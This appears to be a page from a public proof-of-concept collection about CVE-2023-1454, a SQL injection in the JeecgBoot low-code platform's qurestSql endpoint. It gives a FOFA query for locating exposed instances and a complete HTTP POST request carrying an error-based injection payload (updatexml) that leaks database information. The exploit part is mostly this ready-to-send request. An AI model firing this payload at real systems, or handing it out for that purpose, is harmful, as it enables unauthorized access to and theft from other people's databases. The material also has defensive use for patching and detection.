admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞 CVE-2023-1454.md

33 lines
755 B
Markdown
Raw Normal View History

更新漏洞
2023-05-04 14:25:16 +08:00
# JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞 CVE-2023-1454
## 漏洞描述
JeecgBoot 企业级低代码平台 qurestSql接口存在 SQL注入漏洞攻击者通过漏洞可以获取服务器数据库中的敏感数据进一步攻击
## 漏洞影响
JeecgBoot 企业级低代码平台
## FOFA
```
app="JeecgBoot-企业级低代码平台"
```
## 漏洞复现
登陆页面
![image-20230504140737296](images/image-20230504140737296.png)
验证POC
```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Content-Type: application/json
{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
```
![image-20230504140757639](images/image-20230504140757639.png)
Reference in New Issue Copy Permalink